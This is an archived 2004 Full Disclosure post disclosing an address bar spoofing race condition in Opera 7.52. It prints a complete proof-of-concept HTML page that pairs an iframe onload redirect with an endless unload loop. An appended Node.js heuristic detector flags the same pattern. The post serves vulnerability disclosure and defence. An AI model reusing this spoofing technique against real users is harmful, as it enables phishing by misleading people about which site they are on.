Full Disclosure mailing list archives
Opera 7.52 (Build 3834) Address Bar Spoofing Issue
From: "bitlance winter" <bitlance_3 () hotmail com>
Date: Thu, 08 Jul 2004 08:48:23 +0000
Hi List.

A vulnerability is found in the Opera browser version 7.52, which potentially can be exploited by malicious people to conduct phishing attacks against a user.

The issue may be caused due to a race condition and will sometimes make it possible to display spoofed information in the address bar via a specially crafted HTML document.

Tested on WindowsXP SP1.

Demonstration HTML source code:

======== begin ========
[!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"]
[html lang="en"]
[head]
[meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"]
[meta http-equiv="Content-Script-Type" content="text/javascript"]
[meta http-equiv="Content-Style-Type" content="text/css"]
[title]Opera 7.52 Address Bar Spoofing Vulnerability[/title]
[style type="text/css"]
[!--
/* begin */
h1 { font-size:120%;}
h2 { font-size:100%;}
/* end */
--]
[/style]
[script type="text/javascript"]
[!--
function urlfake(){
  location.href="http://www.microsoft.com/";
}
function preinline () {
  myvar = '[iframe onload="urlfake()" ';
  myvar = myvar + 'title="preload inline frame" ';
  myvar = myvar + 'src="http://www.opera.com/" ';
  myvar = myvar + 'frameborder="0" width="760" height="1800" ';
  myvar = myvar + 'marginwidth="0" marginheight="0"]';
  myvar = myvar + '[' + '/iframe]';
  document.write (myvar);
}
// --]
[/script]
[/head]
[body onunload="while(1){};"]
[h1]Opera Browser 7.52 (Build 3834) Address Bar Spoofing Issue[/h1]
[h2]Tested on WindowsXP SP1[/h2]
[p]
[script type="text/javascript"]
[!--
preinline ();
// --]
[/script]
[/p]
[/body]
[/html]
========= end =========

(Sorry, too long code.)

Thank you, List.

--
bitlance winter
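An added example, not part of the original post: a static check, written for Node.js, that flags markup combining the two constructs visible in the demonstration, an unload handler that never returns and an iframe load handler that navigates the top-level location. The name `inspectMarkup`, the finding labels and both sample documents are constructed for illustration, and the pattern matching is a heuristic rather than a full HTML or JavaScript parser.

```javascript
// Added example (not from the original post). Heuristic static check for the
// two constructs the demonstration combines. All names here are hypothetical.

// Trait 1: an (before)unload attribute whose handler contains an unbounded loop.
const SPIN = /\bon(?:before)?unload\s*=\s*(["'])(?:(?!\1).)*?(?:while\s*\(\s*(?:1|true)\s*\)|for\s*\(\s*;\s*;\s*\))/is;
// Trait 2a: an iframe tag (possibly inside a document.write string) whose
// onload calls a named function. The archive shows tags with [ ] for < >.
const FRAME_ONLOAD = /iframe\b[^>\]]*?\bonload\s*=\s*["']\s*([A-Za-z_$][\w$]*)\s*\(/i;

// Trait 2b: that function assigns to location / location.href.
function navigatesTop(html, fn) {
  const name = fn.replace(/\$/g, "\\$");
  const re = new RegExp(
    "function\\s+" + name + "\\s*\\([^)]*\\)\\s*\\{[^}]*" +
    "\\b(?:top\\.|window\\.|self\\.)?location(?:\\.href)?\\s*=[^=]", "i");
  return re.test(html);
}

function inspectMarkup(html) {
  const findings = [];
  if (SPIN.test(html)) findings.push("unload-handler-busy-loop");
  const m = FRAME_ONLOAD.exec(html);
  if (m && navigatesTop(html, m[1])) findings.push("iframe-onload-navigates-top");
  // Either trait alone is common; the posted demonstration uses both together.
  return { findings, suspicious: findings.length === 2 };
}

// Constructed sample in the bracketed form the archive uses (reserved domains).
const flagged = [
  '[script] function go(){ location.href="http://trusted.example/"; }',
  "document.write('[iframe onload=\"go()\" src=\"http://other.example/\"][/iframe]');",
  '[/script][body onunload="while(1){};"][/body]',
].join("\n");

// Constructed benign page: iframe onload updates the title, unload saves state.
const benign = [
  "<script> function fit(){ document.title = 'loaded'; }",
  "function save(){ localStorage.setItem('k','v'); } </script>",
  '<body onunload="save()"><iframe onload="fit()" src="/help.html"></iframe></body>',
].join("\n");

console.log(inspectMarkup(flagged), inspectMarkup(benign));
```

The check only recognises handlers written as attributes and load handlers that call a named function, so a clean result does not prove the markup is harmless.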